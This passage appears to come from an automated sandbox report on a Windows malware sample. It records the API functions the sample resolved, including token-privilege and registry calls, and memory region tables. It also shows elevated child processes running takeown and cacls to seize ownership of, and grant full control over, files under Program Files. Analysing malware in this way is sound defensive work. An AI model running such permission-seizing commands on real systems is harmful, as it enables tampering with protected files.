| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-09 19:48:03 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #153: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #153 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\Templates\Shorthand.jtp" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:52, Reason: Child Process |
| Unmonitor | End Time: 00:02:55, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc8c |
| Parent PID | 0x57c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C88
0x
C78
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00210000 | 0x0021ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000008d0000 | 0x008d0000 | 0x048cffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00000000048d0000 | 0x048d0000 | 0x048effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000048d0000 | 0x048d0000 | 0x048dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000048e0000 | 0x048e0000 | 0x048e3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000048f0000 | 0x048f0000 | 0x048f1fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x048f0000 | 0x048f4fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004900000 | 0x04900000 | 0x04913fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004920000 | 0x04920000 | 0x0495ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004960000 | 0x04960000 | 0x0499ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000049a0000 | 0x049a0000 | 0x049a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000049b0000 | 0x049b0000 | 0x049b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000049c0000 | 0x049c0000 | 0x049c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049d0000 | 0x049d0000 | 0x04acffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ad0000 | 0x04ad0000 | 0x04b0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b10000 | 0x04b10000 | 0x04b10fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b20000 | 0x04b20000 | 0x04b20fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b30000 | 0x04b30000 | 0x04b3ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04b40000 | 0x04bfdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004c00000 | 0x04c00000 | 0x04c3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c40000 | 0x04c40000 | 0x04c6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004c70000 | 0x04c70000 | 0x04df7fff | Pagefile Backed Memory | r |
|
|
|
- |
| imm32.dll | 0x04e00000 | 0x04e29fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004e00000 | 0x04e00000 | 0x04f80fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004f90000 | 0x04f90000 | 0x0638ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x06390000 | 0x066c6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x748a0000 | 0x748c7fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ecb0000 | 0x7ecb0000 | 0x7edaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007edb0000 | 0x7edb0000 | 0x7edd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007edd4000 | 0x7edd4000 | 0x7edd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007edd9000 | 0x7edd9000 | 0x7edd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007edda000 | 0x7edda000 | 0x7eddcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eddd000 | 0x7eddd000 | 0x7eddffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #154: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #154 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:52, Reason: Child Process |
| Unmonitor | End Time: 00:02:53, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc84 |
| Parent PID | 0x6d4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C80
0x
C7C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cacls.exe | 0x00830000 | 0x00839fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000b20000 | 0x00b20000 | 0x04b1ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004b20000 | 0x04b20000 | 0x04b3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004b20000 | 0x04b20000 | 0x04b2ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004b30000 | 0x04b30000 | 0x04b33fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b40000 | 0x04b40000 | 0x04b41fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b40000 | 0x04b40000 | 0x04b43fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004b50000 | 0x04b50000 | 0x04b63fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004b70000 | 0x04b70000 | 0x04baffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bb0000 | 0x04bb0000 | 0x04beffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004bf0000 | 0x04bf0000 | 0x04bf3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004c00000 | 0x04c00000 | 0x04c00fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004c10000 | 0x04c10000 | 0x04c11fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c20000 | 0x04c20000 | 0x04c5ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x04c60000 | 0x04c61fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004c70000 | 0x04c70000 | 0x04c7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c80000 | 0x04c80000 | 0x04e3ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04c80000 | 0x04d3dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004d40000 | 0x04d40000 | 0x04e3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e40000 | 0x04e40000 | 0x04e7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e80000 | 0x04e80000 | 0x0504ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05050000 | 0x05386fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x748a0000 | 0x748c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e3c0000 | 0x7e3c0000 | 0x7e4bffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e4c0000 | 0x7e4c0000 | 0x7e4e2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e4e6000 | 0x7e4e6000 | 0x7e4e8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e4e9000 | 0x7e4e9000 | 0x7e4e9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e4eb000 | 0x7e4eb000 | 0x7e4ebfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e4ed000 | 0x7e4ed000 | 0x7e4effff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #155: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #155 |
